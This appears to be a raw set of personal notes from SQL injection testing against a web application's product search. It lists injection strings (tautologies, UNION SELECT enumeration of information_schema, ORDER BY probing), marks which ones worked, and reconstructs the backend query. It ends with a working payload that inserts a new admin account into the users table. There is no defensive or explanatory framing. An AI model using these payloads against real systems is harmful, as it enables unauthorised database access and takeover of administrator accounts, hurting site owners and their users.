' or 1=1;-- 
"union select 1,*,4,5,6,7,8 from information_schema.tables# 
"union select 1,table_name,3,4,5,6,7,8 from information_schema.tables# 


1' union select * from information_schema.tables


%a"+or"1"='1%--+

%'+or"1"='1-- (works)


'+union+select+1,2,3+or+"1"='1--- throws an error

'or+"1"='1'+union+select+1,2,3+--+'% 


'+order+by+20 


'or+'3'--+


possible queries reconstructed
((select * from ___ where category like '%%' and bu is not null) order by category)


((select * from bproducts where category like '%%' and bu is not null) order by category)


((select * from bproducts where category like '%<>%' or pname like '%<>%' and bu is not null) order by category)


' union select 1,2,'3


((select * from bproducts where category like '%' union select 1,2,'3%' or pname like '%' union select 1,2,'3%' and bu is not null) order by category)

=== this works====


a'))+and+1=1--+

a'))+union+select+1,2,3,4,5,6--+



a'))+insert+into+users(id,fname,lname,type,userid,email,mobile,city,state,postcode,password)+values(34,notjack,lastname,admin,38540,jack@jillmail.com,0,sydney,nsw,2000,90ddf52b5cdc1c8fc00cb91a8ebacee7)--+



====signin====




